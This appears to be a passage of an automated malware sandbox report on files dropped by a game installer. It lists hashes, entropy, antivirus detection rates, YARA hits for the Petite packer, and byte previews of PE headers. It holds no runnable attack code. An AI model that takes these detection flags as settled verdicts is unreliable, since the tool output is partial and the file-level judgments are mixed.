                                                                                          SSDEEP:384:ohtyjknGC7hipL+9mLYFOozxkdlDNUwS5Qq:UGknGC74l+MUFI7C
                                                                                          MD5:2F040608E68E679DD42B7D8D3FCA563E
                                                                                          SHA1:4B2C3A6B8902E32CDA33A241B24A79BE380C55FC
                                                                                          SHA-256:6B980CADC3E7047CC51AD1234CB7E76FF520149A746CB64E5631AF1EA1939962
                                                                                          SHA-512:718AF5BE259973732179ABA45B672637FCA21AE575B4115A62139A751C04F267F355B8F7F7432B56719D91390DABA774B39283CBCFE18F09CA033389FB31A4FC
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........B.........#.........>...f...........0.....h......................... ................ .........................{.......|...............................$...........................pA.......................................................text...4...........................`.P`.data...<....0......."..............@.0..rdata.......@.......$..............@.`@/4...........P.......(..............@.0@.bss.....d...`........................`..edata..{............2..............@.0@.idata..|............4..............@.0..CRT....,............:..............@.0..tls.................<..............@.0..reloc..$............>..............@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):149845
                                                                                          Entropy (8bit):7.893881970959476
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:y0z4JQHu5EvSA/JqiK2s6g+hUCQiMVQ623hi3JKz8KQP6ZwhQrNrbZ:yUju5GY7l+CCYVQ62YUzXQiqhQrJbZ
                                                                                          MD5:526E02E9EB8953655EB293D8BAC59C8F
                                                                                          SHA1:7CA6025602681EF6EFDEE21CD11165A4A70AA6FE
                                                                                          SHA-256:E2175E48A93B2A7FA25ACC6879F3676E04A0C11BB8CDFD8D305E35FD9B5BBBB4
                                                                                          SHA-512:053EB66D17E5652A12D5F7FAF03F02F35D1E18146EE38308E39838647F91517F8A9DC0B7A7748225F2F48B8F0347B0A33215D7983E85FCA55EF8679564471F0B
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-82P0C.tmp, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                          Preview:MZ......................@...................................D.... ..PE..L....r.[...........!....U....D............... ............................... ............@.........................P...........d............................N..........................................................8............................................@..................@..@.rsrc................B..............@..@.......................................@petite..U.......U....F..............`..`.....................................5....`K...=1.;;..s}....3500.z.<..]goR.lVO..C..j...........O......9#f.S.$1.b.D.8...VX....sb .A.%I......B.........R...Z5.............y......_W.0.!..T..nT.V..J..s.1`..V...Cb.2x0......0B...4...D.`...!.>[7..^;w'.u"W/...).P.m...P.......qF<.~1..T.>F.F.Rr.`...N....3$...w.L..P..SQP]C^.....2...%5.v...3.a`.k....q.0.o..A......k.....B..P.h.fy..jyb...<t$.%c-...<9.1#2.7./0.j.o#~...,!fuJ.M..a...(...0@.........,..t.3d"qva....fm.=.....]....s...z}-X..3................y>.!......g..E
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:Unicode text, UTF-8 text
                                                                                          Category:dropped
                                                                                          Size (bytes):1059
                                                                                          Entropy (8bit):5.1208137218866945
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:LLDrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:LLDaJHlxE35QHOs5exm3ogF5n
                                                                                          MD5:B7EDCC6CB01ACE25EBD2555CF15473DC
                                                                                          SHA1:2627FF03833F74ED51A7F43C55D30B249B6A0707
                                                                                          SHA-256:D6B4754BB67BDD08B97D5D11B2D7434997A371585A78FE77007149DF3AF8D09C
                                                                                          SHA-512:962BD5C9FB510D57FAC0C3B189B7ADEB29E00BED60F0BB9D7E899601C06C2263EDA976E64C352E4B7C0AAEFB70D2FCB0ABEF45E43882089477881A303EB88C09
                                                                                          Malicious:false
                                                                                          Preview:Copyright (c) 2011 Jan Kokem.ller..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):294926
                                                                                          Entropy (8bit):6.191604766067493
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:7E0FFjiAeF21pLQFgK33duKMnlCj3eWyNg2hlNvFXl8rzJjjOjVmdX566Uwqwqwm:wKFX3LygKjjN2HIfpruwqwqwFUgVE
                                                                                          MD5:C76C9AE552E4CE69E3EB9EC380BC0A42
                                                                                          SHA1:EFFEC2973C3D678441AF76CFAA55E781271BD1FB
                                                                                          SHA-256:574595B5FD6223E4A004FA85CBB3588C18CC6B83BF3140D8F94C83D11DBCA7BD
                                                                                          SHA-512:7FB385227E802A0C77749978831245235CD1343B95D97E610D20FB0454241C465387BCCB937A2EE8A2E0B461DD3D2834F7F542E7739D8E428E146F378A24EE97
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.........|.....................n.................................c........ ......................`..j7...........................................................................................................................text...8...........................`.P`.data...x...........................@.0..rdata...F.......H..................@.`@/4.......U.......V..................@.0@.bss.........P........................`..edata..j7...`...8...$..............@.0@.idata...............\..............@.0..CRT....,............b..............@.0..tls.................d..............@.0..reloc...............f..............@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):22542
                                                                                          Entropy (8bit):5.5875455203930615
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:RKAPwPQJgZd3rw0bGMtyz1fiaqmjj1nFY4j70UotV9mRyK:YPQJgZZwUGH1fJljj1+D18
                                                                                          MD5:E1C0147422B8C4DB4FC4C1AD6DD1B6EE
                                                                                          SHA1:4D10C5AD96756CBC530F3C35ADCD9E4B3F467CFA
                                                                                          SHA-256:124F210C04C12D8C6E4224E257D934838567D587E5ABAEA967CBD5F088677049
                                                                                          SHA-512:A163122DFFE729E6F1CA6EB756A776F6F01A784A488E2ACCE63AEAFA14668E8B1148BE948EB4AF4CA8C5980E85E681960B8A43C94B95DFFC72FCCEE1E170BD9A
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........X...............,...T...............@....@.......................................... .................................@...........................................................PU..........................P............................text....+.......,..................`.P`.data........@.......0..............@.`..rdata..0....P.......2..............@.0@/4...........`.......<..............@.0@.bss.........p........................`..idata..@............J..............@.0..CRT....4............T..............@.0..tls.................V..............@.0.................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):126478
                                                                                          Entropy (8bit):6.268811819718352
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:UnNKg6JaJUeHjiaphKMLrn8uexz3TmBUg6xcE:UNcJGGehKMLJBUg6x
                                                                                          MD5:6E93C9C8AADA15890073E74ED8D400C9
                                                                                          SHA1:94757DBD181346C7933694EA7D217B2B7977CC5F
                                                                                          SHA-256:B6E2FA50E0BE319104B05D6A754FE38991E6E1C476951CEE3C7EBDA0DC785E02
                                                                                          SHA-512:A9F71F91961C75BB32871B1EFC58AF1E1710BDE1E39E7958AE9BB2A174E84E0DD32EBAAB9F5AE37275651297D8175EFA0B3379567E0EB0272423B604B4510852
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....^...................p.....m.........................p......f......... .........................{.... ...............................P..............................X........................!...............................text....\.......^..................`.P`.data........p.......b..............@.`..rdata..h&.......(...d..............@.`@/4......\B.......D..................@.0@.bss..................................`..edata..{...........................@.0@.idata....... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):852754
                                                                                          Entropy (8bit):6.503318968423685
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:fpFFQV+FKJ37Dm+yY4pBkPr2v2meLaoHN/oBrZ3ixdnGVzpJXm/iN:fpnzFw37iDYIBkzuPcHNgrZ3uGVzm/iN
                                                                                          MD5:07FB6D31F37FB1B4164BEF301306C288
                                                                                          SHA1:4CB41AF6D63A07324EF6B18B1A1F43CE94E25626
                                                                                          SHA-256:06DDF0A370AF00D994824605A8E1307BA138F89B2D864539F0D19E8804EDAC02
                                                                                          SHA-512:CAB4A7C5805B80851ABA5F2C9B001FABC1416F6648D891F49EACC81FE79287C5BAA01306A42298DA722750B812A4EA85388FFAE9200DCF656DD1D5B5B9323353
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L..Y.,..v......!......... .....................a................................O}........ ......................................@.......................P..X0...........................0.......................................................text...............................`.P`.data...............................@.`..rdata..............................@.`@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,.... ......................@.0..tls.... ....0......................@.0..rsrc........@......................@.0..reloc..X0...P...2..................@.0B/4...................&..............@.@B/19.................*..............@..B/31..........@......................@..B/45..........`......................@..B/57.................................@.0B/70.....i...............
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):39304
                                                                                          Entropy (8bit):7.819409739152795
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:i5GGx+OZPWuGdoiwUpPLH7IN3x1eW0kIAJbfT13MMnahRlmftuohQf:i5DxDPWMApPLsNhkVkI6R3TnalauoQ
                                                                                          MD5:C7A50ACE28DDE05B897E000FA398BBCE
                                                                                          SHA1:33DA507B06614F890D8C8239E71D3D1372E61DAA
                                                                                          SHA-256:F02979610F9BE2F267AA3260BB3DF0F79EEEB6F491A77EBBE719A44814602BCC
                                                                                          SHA-512:4CD7F851C7778C99AFED492A040597356F1596BD81548C803C45565975CA6F075D61BC497FCE68C6B4FEDC1D0B5FD0D84FEAA187DC5E149F4E8E44492D999358
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....."b...........!.........x.......P.......................................`.......Z....@.........................PR.......Q..d....0..0............}......D........................................................Q..8.................................... .......t..................@..@.rsrc.... ...0.......v..............@..@petite.......P.......z..............`..`......................p..k..K..i{..\.H..'.|w.t...\..dkB%..i.cX...`*B...m.X..A.NU.i.I. J.I....x-.e2n.IA.2.:..2G5Z/.+(8w.S<...`ML........!..%+.r.s.1.~.D...]......U..q3.....9..?y.>j.E.T...Y..D..>..aJ......P^Y..w?.9w.,...+C^.[....|..'.....7..F%..A.....)..b.)8.2Q`.v.F=.."S*..{z...z-H=....L_....RM..s......H2P1a....[..i. 2..~.?...+R... .m(.I..X...H.g.Z..i..G.?.(......e.:.B......fh......gl.x.Z......I>..#....Hgv.;g.@ l.$(...0.........l.>.p..z;A.@...*4v..x.U.gU..Bqqb..6.x...D.....cIE(5m.g}J..
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):845312
                                                                                          Entropy (8bit):6.581151900686739
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:PgQ5Lxf4qcB5SdtFJPAYiXbJ1luVw6DbhJLJbCKShfCtk/8ou/UvfK7hs4I:H5Ng9zK5Puq7hsN
                                                                                          MD5:00C672988C2B0A2CB818F4D382C1BE5D
                                                                                          SHA1:57121C4852B36746146B10B5B97B5A76628F385F
                                                                                          SHA-256:4E9F3E74E984B1C6E4696717AE36396E7504466419D8E4323AF3A89DE2E2B784
                                                                                          SHA-512:C36CAE5057A4D904EBDB5495E086B8429E99116ACBE7D0F09FB66491F57A7FC44232448208044597316A53C7163E18C2F93336B37B302204C8AF6C8F1A9C8353
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2...va.va.va.b..fa.b...a.b..`a.$..ya.$..`a.$..1a.b..ua.va.*a. ...a. ..wa. ...wa.vat.wa. ..wa.Richva.................PE..L......c...........!.................F.......0............................... ......u.....@.......................... ...q..t...(....P.......................`..p.......T...........................8...@............0..D............................text............................... ..`.rdata...i...0...j..................@..@.data...............................@....rsrc........P.......(..............@..@.reloc..p....`......................@..B........................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):36416
                                                                                          Entropy (8bit):7.842278356440954
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:lshkyPXvH6bPACtmb8boNQdVfCXewki/OvXEApOqmFfSq1oIQMW:lsh3n5Pb8boOdVCuwNEXEAonfSq1JQb
                                                                                          MD5:BEBA64522AA8265751187E38D1FC0653
                                                                                          SHA1:63FFB566AA7B2242FCC91A67E0EDA940C4596E8E
                                                                                          SHA-256:8C58BC6C89772D0CD72C61E6CF982A3F51DEE9AAC946E076A0273CD3AAF3BE9D
                                                                                          SHA-512:13214E191C6D94DB914835577C048ADF2240C7335C0A2C2274C096114B7B75CD2CE13A76316963CCD55EE371631998FAC678FCF82AE2AE178B7813B2C35C6651
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...................................D.... ..PE..L....}.Q...........!................6 ............`..........................0......................................d#.......!..........@...................t...........................................................................................................................`....rsrc...........@...................@..@....................................@................ ......................`.......................................X...{.......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!... c.f.`P....h.p..j..P..C.h..`..<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I.....................]...............'..................................A...%...........
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):967168
                                                                                          Entropy (8bit):6.500850562754145
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:j2ezAN6FpYQSzclODziLQEkkDHFb1aWGssVvVmPUwV+SiRm7rhj:jhAgFptPlqmPDHJ1apVdYUy+jRmX
                                                                                          MD5:C06D6F4DABD9E8BBDECFC5D61B43A8A9
                                                                                          SHA1:16D9F4F035835AFE8F694AE5529F95E4C3C78526
                                                                                          SHA-256:665D47597146DDAAA44B771787B750D3CD82C5B5C0B33CA38F093F298326C9BB
                                                                                          SHA-512:B0EBE9E2682A603C34F2B884121FA5D2D87ED3891990CCD91CD14005B28FE208A3B86FA20E182F9E7FC5142A267C8225AEFDCB23CF5B7556D2CF8F9E3BDE62D4
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.~..m...m...m......m.....m......m.......m..)3...m..)3...m..)3...m.......m...m..rm...m..m..3...m..3...m..3...m..Rich.m..........................PE..L...8..^...........!.........&.......`....................................................@..........................4.......G..<...............................HR..P+..T............................+..@...............D............................text............................... ..`.rdata..............................@..@.data........P...$...D..............@....trace.......`.......h..............@..@.gfids...............~..............@..@_RDATA..@...........................@..@.debug_o............................@..B.rsrc................l..............@..@.reloc..HR.......T...n..............@..B................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):62478
                                                                                          Entropy (8bit):6.063363187934607
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:q3s6+NMpjqudP/XB9rGCWLEc6wY3U0LvDcb0wGNPdqdRJy/5f4mdajO42iySAqB:q8zNM1nBId/ce7GNP6m/5AQGySAs
                                                                                          MD5:940EEBDB301CB64C7EA2E7FA0646DAA3
                                                                                          SHA1:0347F029DA33C30BBF3FB067A634B49E8C89FEC2
                                                                                          SHA-256:B0B56F11549CE55B4DC6F94ECBA84AEEDBA4300D92F4DC8F43C3C9EEEFCBE3C5
                                                                                          SHA-512:50D455C16076C0738FB1FECAE7705E2C9757DF5961D74B7155D7DFB3FAB671F964C73F919CC749D100F6A90A3454BFF0D15ED245A7D26ABCAA5E0FDE3DC958FD
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................k.........................`................ .........................r.......D............................P..|.......................................................\............................text...............................`.P`.data...0...........................@.0..rdata..8...........................@.`@/4......L...........................@.0@.bss..................................`..edata..r...........................@.0@.idata..D...........................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc..|....P......................@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):512014
                                                                                          Entropy (8bit):6.566561154468342
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:BNKab1bu1dEpBZvkO4KTYnyA0bFHmufLKNs3gv:rKcozEpbvkOCyA0xGufLKau
                                                                                          MD5:C4A2068C59597175CD1A29F3E7F31BC1
                                                                                          SHA1:89DE0169028E2BDD5F87A51E2251F7364981044D
                                                                                          SHA-256:7AE79F834A4B875A14D63A0DB356EEC1D356F8E64FF9964E458D1C2050E5D180
                                                                                          SHA-512:0989EA9E0EFADF1F6C31E7FC243371BB92BFD1446CF62798DCA38A021FAD8B6ADB0AEABDFBDC5CE8B71FE920E341FC8AB4E906B1839C6E469C75D8148A74A08A
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P/.d...........#...(.l.........................n.........................P............@... ..........................:........... .......................0..L...........................d...........................P............................text....k.......l..................`..`.data................p..............@....rdata...t.......v...r..............@..@/4......L...........................@..@.bss....X................................edata...:.......<...j..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc........ ......................@....reloc..L....0......................@..B........................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):5960
                                                                                          Entropy (8bit):5.956401374574174
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:dj78cqhzbWKlECE7WbjDFf6IhaYYUOAoDf4+XCVhovG9AkM7Ui10:CjlEJ7WbjDFf6waYvdc4gYAkM10
                                                                                          MD5:B3CC560AC7A5D1D266CB54E9A5A4767E
                                                                                          SHA1:E169E924405C2114022674256AFC28FE493FBFDF
                                                                                          SHA-256:EDDE733A8D2CA65C8B4865525290E55B703530C954F001E68D1B76B2A54EDCB5
                                                                                          SHA-512:A836DECACB42CC3F7D42E2BF7A482AE066F5D1DF08CCCC466880391028059516847E1BF71E4C6A90D2D34016519D16981DDEEACFB94E166E4A9A720D9CC5D699
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...................................D.... ..PE..L......I...........!.....4...T......6`....... ...............................p......................................lc.......a.......@..H....................................................................................................................0..........................`....rsrc........@..H...................@..@.............P......................@................`......................`.......................................X....E......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!...`..f.`P....h....j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I.e...h....P..0................0..............h.... ..0...........6...........k...........
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):115712
                                                                                          Entropy (8bit):6.401537154757194
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:rY4gILp0Vt7BMkvfHutO+eP0ZjflQf5xqkYXeo21sb2rqG70:rY4gILp0Vt77nLBCtQfjqv8qG70
                                                                                          MD5:840D631DA54C308B23590AD6366EBA77
                                                                                          SHA1:5ED0928667451239E62E6A0A744DA47C74E1CF89
                                                                                          SHA-256:6BAD60DF9A560FB7D6F8647B75C367FDA232BDFCA2291273A21179495DAC3DB9
                                                                                          SHA-512:1394A48240BA4EF386215942465BDE418C5C6ED73FC935FE7D207D2A1370155C94CDC15431985ED4E656CA6B777BA79FFC88E78FA3D99DB7E0E6EAC7D1663594
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?..R{...{...{...o...q...o.......o...i...)...W...)...t...)...j...o...x...{.......-...s...-...z...-.4.z...-...z...Rich{...........PE..L....H.a...........!.....$...........h.......@............................... ............@.............................x.......(.......................................8..............................@............@..D............................text....#.......$.................. ..`.rdata...x...@...z...(..............@..@.data.... ..........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):123406
                                                                                          Entropy (8bit):6.263889638223575
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:hnPkU1t2P2hHV5JG1YBBAUBEd8+poyez9djcx2/8s6UJqfxX+1XOAhbKzb3+d:xPu21IYyCTToE6c+6e+d
                                                                                          MD5:B49ECFA819479C3DCD97FAE2A8AB6EC6
                                                                                          SHA1:1B8D47D4125028BBB025AAFCA1759DEB3FC0C298
                                                                                          SHA-256:B9D5317E10E49AA9AD8AD738EEBE9ACD360CC5B20E2617E5C0C43740B95FC0F2
                                                                                          SHA-512:18617E57A76EFF6D95A1ED735CE8D5B752F1FB550045FBBEDAC4E8E67062ACD7845ADC6FBE62238C383CED5E01D7AA4AB8F968DC442B67D62D2ED712DB67DC13
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................R.......d>..........p....@...........................@......^........ ...............................@.4...................................................................................|.@.@............................text....Q.......R..................`.P`.data...\....p.......V..............@.@..rdata...a.......b...X..............@.`@/4..................................@.0@.bss.....c>...........................`..idata..4.....@.....................@.0..CRT....4.....@.....................@.0..tls..........@.....................@.0.................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):35588
                                                                                          Entropy (8bit):7.817557274117395
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:dCrMZHv56WRldhmLjQDrbfc8cznHvc6modHQ:sAR0LzHvc6m2HQ
                                                                                          MD5:58521D1AC2C588B85642354F6C0C7812
                                                                                          SHA1:5912D2507F78C18D5DC567B2FA8D5AE305345972
                                                                                          SHA-256:452EEE1E4EF2FE2E00060113CCE206E90986E2807BB966019AC4E9DEB303A9BD
                                                                                          SHA-512:3988B61F6B633718DE36C0669101E438E70A17E3962A5C3A519BDECC3942201BA9C3B3F94515898BB2F8354338BA202A801B22129FC6D56598103B13364748C1
                                                                                          Malicious:false
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-H4RQI.tmp, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                          Preview:MZ......................@...................................D.... ..PE..L.....yX...........!.................@.......................................P............@.........................PB.......A..d.... ..@...................P........................................................A..8...............................................................@..@.rsrc........ ......................@..@.............0.........................@petite.......@......................`..`...................................._3.....g.ge..7t...R-_.R.@c.S.\..J?L.EZ.,....=H8..;.QJ.....P-)eFs93:.^...f......}..?...e...SD.......-.u.......q2...P...6..z5.T.S..P..Q....@..Mq.>....8" F...,..FE...S.[U..c......jr....b...-%...`......w..+W.C......]..#......LS....W.Y....o.8...i.[)..%(.2.t...YY .bL.....b.@&J,?l.........$..F..&...a#.\[".^...&]co....K.>...xQzw..XW.uT..+dm.o.b...@c....3..r....@]...P........{C/.....A!.&..........'....._..."S..&..F.......:.dxtK.6...7.I...Q..Nm2.....NX..fG..L..7.?..".(
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):18966
                                                                                          Entropy (8bit):7.620111275837424
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:gOKwxnw6OVDU839fgRgFMkucNauTT80CyTIz2bGjqXOK0Jo:gOHwBDUOe2McQkI0Cyo2Q/o
                                                                                          MD5:F0F973781B6A66ADF354B04A36C5E944
                                                                                          SHA1:8E8EE3A18D4CEC163AF8756E1644DF41C747EDC7
                                                                                          SHA-256:04AB613C895B35044AF8A9A98A372A5769C80245CC9D6BF710A94C5BC42FA1B3
                                                                                          SHA-512:118D5DACC2379913B725BD338F8445016F5A0D1987283B082D37C1D1C76200240E8C79660E980F05E13E4EB79BDA02256EAC52385DAA557C6E0C5D326D43A835
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-HBA5G.tmp, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 3%
